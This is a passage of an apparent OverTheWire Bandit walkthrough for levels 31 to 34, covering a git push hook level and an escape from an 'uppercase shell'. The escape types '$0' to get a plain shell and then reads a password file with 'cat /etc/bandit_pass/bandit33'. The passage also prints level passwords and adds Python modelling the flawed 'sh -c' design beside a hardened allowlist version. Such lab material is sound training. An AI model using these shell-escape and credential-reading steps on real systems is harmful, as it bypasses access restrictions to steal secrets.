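        self.refs[f"refs/tags/{name}"] = oid

    def branch(self, name: str, commit_oid: str) -> None:
        self.refs[f"refs/heads/{name}"] = commit_oid

    def resolve(self, ref: str) -> GitObject:
        oid = self.refs.get(f"refs/tags/{ref}") or self.refs.get(f"refs/heads/{ref}") or ref
        if oid not in self.objects:
            raise KeyError(f"unknown ref {ref}")
        return self.objects[oid]

    def checkout(self, ref: str) -> bytes:
        """checkout needs a tree: a commit supplies one through its 'tree' line,
        a blob supplies none, hence git's 'reference is not a tree'."""
        kind, content = self.resolve(ref)
        if kind == "commit":
            tree_oid = content.split(b"\n")[0].split()[1].decode()
            kind, content = self.objects[tree_oid]
        if kind != "tree":
            raise ValueError(f"fatal: reference is not a tree: {ref}")
        return content

    def show(self, ref: str) -> bytes:
        """show prints a blob's raw content, which is why `git show secret` printed a password."""
        kind, content = self.resolve(ref)
        return content if kind == "blob" else f"{kind}\n".encode() + content


def checkout_error(repo: Repo, ref: str) -> Optional[str]:
    try:
        repo.checkout(ref)
        return None
    except ValueError as exc:
        return str(exc)


def build_level30_like_repo() -> Repo:
    """One commit holding the README from the level, plus a tag aimed straight at a blob."""
    repo = Repo()
    readme = repo.store("blob", b"just an epmty file... muahaha\n")
    tree = repo.store("tree", f"100644 README.md\0{readme}".encode())   # simplified tree
    commit = repo.store("commit", f"tree {tree}\n\ninitial commit of README.md\n".encode())
    repo.branch("master", commit)
    repo.tag("secret", repo.store("blob", b"PLACEHOLDER-PASSWORD\n"))  # constructed secret
    return repo
```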

Bandit Level 31 → Level 32

Level Goal

There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo. The password for the user bandit31-git is the same as for the user bandit31.

Clone the repository and find the password for the next level.

This level is about pushing to a remote git repository.

Usual steps: create a directory and git clone.

bandit31@bandit:/tmp/highway31/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
    File name: key.txt
    Content: 'May I come in?'
    Branch: master

🆗 Let's write the file:

bandit31@bandit:/tmp/highway31/repo$ touch key.txt
bandit31@bandit:/tmp/highway31/repo$ vim key.txt
bandit31@bandit:/tmp/highway31/repo$ cat key.txt
May I come in?

Then stage key.txt:

bandit31@bandit:/tmp/highway31/repo$ git add key.txt
The following paths are ignored by one of your .gitignore files:
key.txt
Use -f if you really want to add them.

.gitignore blocked us, but no matter: as the message says, -f forces the add.

bandit31@bandit:/tmp/highway31/repo$ git add -f key.txt
bandit31@bandit:/tmp/highway31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

	new file:   key.txt

Confirmed we're on master.

Next, commit and push:

bandit31@bandit:/tmp/highway31/repo$ git commit -m "key"
[master cc87669] key
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
bandit31@bandit:/tmp/highway31/repo$ git push
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit31-git@localhost's password: 
Permission denied, please try again.
bandit31-git@localhost's password: 
Counting objects: 3, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 317 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote: 
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote: 
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote: 
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote: 
To ssh://localhost/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'

Password in hand (the pre-receive hook prints it and then rejects the push). Next level.

Bandit Level 32 → Level 33

After all this git stuff its time for another escape. Good luck!

This level involves a bit of guessing; let's look first:

WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: not found
>> man ls
sh: 1: MAN: not found

It converts your command to upper case, after which the shell can't find it.

First idea: are there any commands with upper-case names? No, so skip that.

A write-up found via Google gave me the idea.

We can guess that this uppercase shell takes what you type as its one input (from my second example it appears to take only a single argument), converts it to upper case and then hands it to sh to execute.

Then we need to learn about the $0 variable, which is a very special one:

If bash is started with the -c option, then $0 is set to the first argument after the string to be executed, if one is present. Otherwise, it is set to the file name used to invoke bash, as given by argument zero.

What is the meaning of $0 in the Bash shell

So the shell probably looks something like this:

#!/bin/bash
# Author's guess at the uppercase shell: read a line, convert it to upper case,
# and hand the result to sh -c. Inside that sh, $0 is the shell's own name ("sh"),
# which is why typing $0 starts an unrestricted shell.
read -r -p ">> " cmd
sh -c "${cmd^^}"

So we use $0 to get the real shell:

WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee
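The uppercase shell's behaviour modelled in Python next to a hardened variant, as an added example that is not from the write-up; the real binary behind the level is not shown on the page and is not reproduced. It shows why upper-casing is no filter at all (the string "$0" is unchanged by upper-casing and sh expands it to its own name), and that the fix is never to route user input through `sh -c`. The allowlist is constructed.

```python
import shlex
import subprocess
from typing import Optional

ALLOWED = {"ID", "WHOAMI", "ECHO"}   # constructed allowlist for the hardened variant


def uppercase_shell(line: str, stdin: str = "") -> subprocess.CompletedProcess:
    """The level's shell as guessed from its output: upper-case the line, then sh -c.
    `stdin` stands for what the user would type once `$0` has become a plain sh:
    sh -c "$0" sets $0 to "sh", so the 'filtered' command is just another shell."""
    return subprocess.run(["sh", "-c", line.upper()], input=stdin,
                          capture_output=True, text=True, timeout=10)


def hardened_shell(line: str) -> Optional[subprocess.CompletedProcess]:
    """Same restriction without `sh -c`: tokenise, check the command word against an
    allowlist, and exec the argv directly. No shell ever sees the input, so `$0`
    (and every other metacharacter) stays a literal argument. Returns None when
    the command is refused."""
    argv = shlex.split(line.upper())
    if not argv or argv[0] not in ALLOWED:
        return None
    argv[0] = argv[0].lower()   # map the upper-cased name back to the real binary
    return subprocess.run(argv, capture_output=True, text=True, timeout=10)


def escaped(line: str, typed_afterwards: str) -> bool:
    """True if `line` got us an unrestricted shell that then ran `typed_afterwards`."""
    result = uppercase_shell(line, stdin=typed_afterwards + "\n")
    return result.returncode == 0 and result.stdout.strip() == typed_afterwards.split()[-1]


if __name__ == "__main__":
    print(uppercase_shell("ls").stderr.strip())          # LS: not found
    print(escaped("$0", "echo escaped"))                  # True
    print(hardened_shell("$0"))                           # None: refused
    print(hardened_shell("echo $0").stdout.strip())       # $0, not expanded
```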

Finally, the last level.

Bandit Level 33 → Level 34

At this moment, level 34 does not exist yet.

emmmmm 😂😂😂 OK, that's the end.
